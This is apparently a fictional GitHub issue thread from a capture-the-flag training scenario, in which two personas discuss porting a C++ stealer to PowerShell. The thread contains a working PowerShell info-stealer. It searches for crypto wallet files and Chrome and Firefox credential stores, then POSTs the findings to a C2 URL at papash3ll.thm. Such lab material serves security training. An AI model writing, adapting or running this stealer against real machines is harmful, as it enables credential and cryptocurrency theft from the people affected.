Open MM-WarevilleTHM opened 3 weeks ago
Bloatware-WarevilleTHM
commented
3 weeks ago Hey MM, Thanks for the shoutout. Haha, I totally get it! Pointers and memory management can feel like trying to defuse a bomb with a toothpick.
I’m guessing it’s the file searching and C2 communication that’s got you sweating. Share your code, and we'll see what we have.
MM-WarevilleTHM
commented
3 weeks ago Exactly! The part where it’s checking for wallet files and credential files is straightforward, but I’m not sure how PowerShell handles things like sending data to a server.
This is what I’ve got currently and did away with the malloc and free in PowerShell (thank goodness).
function Print-AsciiArt {
Write-Host " ____ _ ___ _____ ___ _ _ "
Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
Write-Host "| | _ | | | | | | | | | |_| |"
Write-Host "| |_| | | |___ | | | | | |__ | _ |"
Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
Write-Host " Created by the one and only M.M."
}
# Call the function to print the ASCII art
Print-AsciiArt
# Path for the info file
$infoFilePath = "stolen_info.txt"
# Function to search for wallet files
function Search-ForWallets {
$walletPaths = @(
"$env:USERPROFILE\.bitcoin\wallet.dat",
"$env:USERPROFILE\.ethereum\keystore\*",
"$env:USERPROFILE\.monero\wallet",
"$env:USERPROFILE\.dogecoin\wallet.dat"
)
Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
foreach ($path in $walletPaths) {
if (Test-Path $path) {
Add-Content -Path $infoFilePath -Value "Found wallet: $path"
}
}
}
# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
$firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
if (Test-Path $chromePath) {
Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
}
if (Test-Path $firefoxPath) {
Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
}
}
# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
$c2Url = "http://papash3ll.thm/data"
$data = Get-Content -Path $infoFilePath -Raw
# Using Invoke-WebRequest to send data to the C2 server
Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}
# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2ServerHaha, yes, you’re free from the malloc/free life! PowerShell will take care of memory for you. For sending data to the server, PowerShell’s Invoke-WebRequest is your best friend and looks like you set it up nicely – it’s a lot easier than dealing with cURL’s verbosity.
This script keeps it nice and simple – no need for C++’s struct stat for checking file existence; PowerShell’s Test-Path handles it for you. For sending the data, Invoke-WebRequest makes the C2 part painless.
Also, I like the ASCII art you have included on it. 🙂
MM-WarevilleTHM
commented
3 weeks ago Thanks a lot! This would have gone a totally different way when I was thinking of writing a PowerShell script with malloc – I was about to go full C++-PowerShell hybrid and possibly break the universe.
The ASCII was just a touch of flair 😉
Hey Bloatware,
I came across this pretty cool C++ script of yours and would like to use it for Wareville. My only issue is that I'm not too good with C++ and I don’t really vibe. I’m much more comfortable with PowerShell.
The code does some interesting things, like searching for wallet and browser credential files and sending the findings to a C2 server. I’d love to cross-check my PowerShell version of this, especially since my C++ skills are about as sharp as a butter knife these days.
Appreciate any guidance! Please save me from pointer madness 😅.